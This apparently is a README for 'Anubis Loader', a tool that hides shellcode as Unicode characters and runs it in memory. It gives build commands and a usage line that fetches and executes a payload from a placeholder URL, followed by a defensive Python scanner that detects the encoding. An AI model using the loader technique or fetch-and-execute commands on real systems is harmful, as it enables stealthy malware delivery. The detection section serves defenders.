Anubis Loader is a Unicode‑based shellcode obfuscation and loading framework.
It includes both a Python obfuscator and Windows-native loaders capable of decoding and executing Unicode‑encoded payloads from local files or HTTP sources.
- Unicode Shellcode Obfuscation
  Encodes raw shellcode bytes into high‑range Unicode characters for stealthy transport.
- Local & Remote Loading
  Supports execution from local UTF‑8 encoded files or direct HTTP download.
- In‑Memory Execution
  Allocates RWX memory, decodes bytes, and executes the payload without touching disk.
- Surrogate-Pair Handling
  Proper decoding of multi‑byte UTF‑8 sequences and Unicode surrogate pairs.
obfuscate.py converts binary shellcode into a sequence of characters starting at Unicode base 0x13000.
The local loader reads a UTF‑8 file, decodes the Unicode sequence, converts it back to bytes, and executes it from memory.
The HTTP loader uses WinINet to fetch obfuscated Unicode data from a remote server, decodes it, and executes it in memory.
cl stageloader.c /link wininet.lib -o anubis_stage_loader.exe
# for cross compile from linux
x86_64-w64-mingw32-gcc stageloader.c -o anubis_stage_loader.exe -lwininet

python obfuscate.py input.bin -o output.txt
Anubis_loader.exe output.txt
Anubis_http_loader.exe https://example.com/payload.txt

- Encoding
  Each shellcode byte is transformed into a Unicode code point:
  encoded = 0x13000 + byte_value
- Transport
  Encoded content is distributed as UTF‑8 text.
- Decoding
  The loader reads each Unicode code point and subtracts the base offset to recover the original byte.
- Execution
  Memory is allocated via VirtualAlloc, permissions updated via VirtualProtect, then executed.
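
For detection, the encoding above has a fixed byte signature: code points U+13000 through U+130FF are F0 93 80 80 through F0 93 83 BF in UTF‑8, so encoded content can be found in files or HTTP response bodies with a byte pattern. The scanner below is an added example, not part of Anubis Loader; the function name, the MIN_RUN threshold and the sample input are assumptions.

```python
import hashlib
import re

BASE = 0x13000  # base offset stated on the page
MIN_RUN = 16    # assumed threshold: shortest run of code points worth flagging

# One encoded byte is one code point in U+13000..U+130FF, which UTF-8
# serialises as F0 93 [80-83] [80-BF]. Match long unbroken runs of them.
RUN_RE = re.compile(rb"(?:\xf0\x93[\x80-\x83][\x80-\xbf]){%d,}" % MIN_RUN)


def find_encoded_runs(data: bytes):
    """Scan raw file or HTTP body bytes; return one finding per encoded run.

    Each finding gives the byte offset of the run, the number of recovered
    bytes, and their SHA-256 so the content can be matched against known
    hashes without handling it further.
    """
    findings = []
    for m in RUN_RE.finditer(data):
        text = m.group().decode("utf-8")
        recovered = bytes(ord(ch) - BASE for ch in text)
        findings.append({
            "offset": m.start(),
            "length": len(recovered),
            "sha256": hashlib.sha256(recovered).hexdigest(),
        })
    return findings


if __name__ == "__main__":
    # Constructed sample: 64 benign bytes encoded with the page's formula,
    # embedded in ordinary text, as a fetched body might look.
    benign = bytes(range(64))
    encoded = "".join(chr(BASE + b) for b in benign).encode("utf-8")
    body = b"<html>" + encoded + b"</html>"
    for f in find_encoded_runs(body):
        print(f)
    # Short legitimate hieroglyph text stays below the threshold.
    print(find_encoded_runs("two signs: \U00013000\U00013050".encode("utf-8")))
```

Legitimate Egyptian hieroglyph text also uses this block, so tune MIN_RUN and treat a hit as a lead for triage rather than a verdict.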
